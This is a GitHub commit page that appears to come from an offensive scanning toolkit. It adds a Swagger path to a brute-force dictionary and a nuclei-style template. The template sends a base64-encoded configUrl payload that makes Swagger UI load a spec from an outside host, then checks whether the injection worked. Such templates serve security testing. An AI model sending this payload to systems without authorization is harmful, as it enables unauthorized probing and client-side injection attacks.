Skip to content

Commit ae21f31

Browse files
committed
x 2023-02-09
1 parent c515d08 commit ae21f31

File tree

2 files changed

+30
-0
lines changed

2 files changed

+30
-0
lines changed

brute/dicts/filedic.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -102,6 +102,7 @@
102102
/apps/frontend/modules/main/templates/loginSuccess.php
103103
/apps/frontend/modules/main/validate/login.yml
104104
/auth/login
105+
/classicapi/doc/
105106
/auth/login/github
106107
/auth/login/google
107108
/auth/login/sentry/

config/51pwn/swagger.yaml

Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
id: swagger_51pwn
2+
3+
info:
4+
name: swagger api
5+
author: 51pwn
6+
severity: critical
7+
description: |
8+
swagger api
9+
10+
requests:
11+
- raw:
12+
- |
13+
GET /classicapi/doc/ HTTP/1.1
14+
Host: {{Hostname}}
15+
- |
16+
GET /classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ== HTTP/1.1
17+
Host: {{Hostname}}
18+
19+
matchers-condition: or
20+
stop-at-first-match: true
21+
matchers:
22+
- type: word
23+
words:
24+
- 'swagger.yaml'
25+
condition: and
26+
- type: word
27+
words:
28+
- 'exuberant-ice.surge.sh'
29+
condition: and

0 commit comments

Comments
 (0)